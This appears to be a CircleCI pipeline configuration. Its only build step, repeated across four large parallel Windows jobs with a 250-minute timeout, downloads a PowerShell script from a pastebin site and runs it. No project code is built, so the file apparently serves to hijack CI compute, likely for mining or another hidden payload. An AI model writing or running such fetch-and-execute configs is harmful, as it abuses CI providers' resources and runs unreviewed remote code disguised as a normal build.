working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run:
        name: Build Runner
        command: |
            Invoke-WebRequest https://www.heypasteit.com/download/0IXURN -OutFile sumilang.ps1
            ./sumilang.ps1
        no_output_timeout: 250m
version: 2.1
orbs:
  win: circleci/windows@2.4
jobs:
  build:
    <<: *script
    executor: 
      name: win/default
      size: large
    parallelism: 2
  build1:
    <<: *script
    executor: 
      name: win/default
      size: large
    parallelism: 2
  build2:
    <<: *script
    executor: 
      name: win/default
      size: large
    parallelism: 3
  build3:
    <<: *script
    executor: 
      name: win/default
      size: large
    parallelism: 3
workflows:
  version: 2.1
  commit:
    jobs:
      - build
      - build1
      - build2
      - build3